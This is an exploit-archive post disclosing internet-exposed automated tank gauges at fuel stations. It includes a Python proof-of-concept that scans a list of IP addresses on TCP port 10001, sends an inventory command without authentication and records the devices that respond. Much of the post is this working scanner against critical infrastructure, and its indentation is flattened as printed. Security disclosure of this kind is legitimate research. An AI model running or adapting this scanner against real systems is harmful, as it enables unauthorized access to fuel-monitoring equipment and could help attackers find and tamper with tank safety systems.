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Automated Tank Gauge (ATG) Remote Configuration Disclosure

Automated Tank Gauge (ATG) Remote Configuration Disclosure
Posted Nov 3, 2022
Authored by RoseSecurity

In 2015, HD Moore, the creator of Metasploit, published an article disclosing over 5,800 gas station Automated Tank Gauges (ATGs) which were publicly accessible. Besides monitoring for leakage, these systems are also instrumental in gauging fluid levels, tank temperature, and can alert operators when tank volumes are too high or have reached a critical low. ATGs are utilized by nearly every fueling station in the United States and tens of thousands of systems internationally. They are most commonly manufactured by Veeder-Root, a supplier of fuel dispensers, payment systems, and forecourt merchandising. For remote monitoring of these fuel systems, operators will commonly configure the ATG serial interface to an internet-facing TCP port (generally set to TCP 10001). This script reads the Get In-Tank Inventory Report from TCP/10001 as a proof of concept to demonstrate the arbitrary access.

tags | exploit, remote, arbitrary, root, tcp, proof of concept
SHA-256 | 1222ef3166eddf3e2b1283c72bc5f78616ec813de663f9a776c261eacba66ccf

Automated Tank Gauge (ATG) Remote Configuration Disclosure

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#!/usr/bin/env python3


import time
import socket
with open("/tmp/ATG_SCAN.txt",'r') as atg_file:
for line in atg_file.read().splitlines():
try:
atg_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
port = 10001
search_str = 'IN-TANK INVENTORY'
msg = str('\x01' + 'I20100' + '\n').encode('ascii')
atg_socket.connect((line, port))
atg_socket.send(msg)
time.sleep(.25)
response = atg_socket.recv(1024).decode()
if search_str in response:
with open("/tmp/ATG_DEVICES.txt", 'a') as file2:
file2.write(line + "\t ->\tATG Device\n")
else:
continue
atg_socket.close()
except:
pass
atg_file.close()



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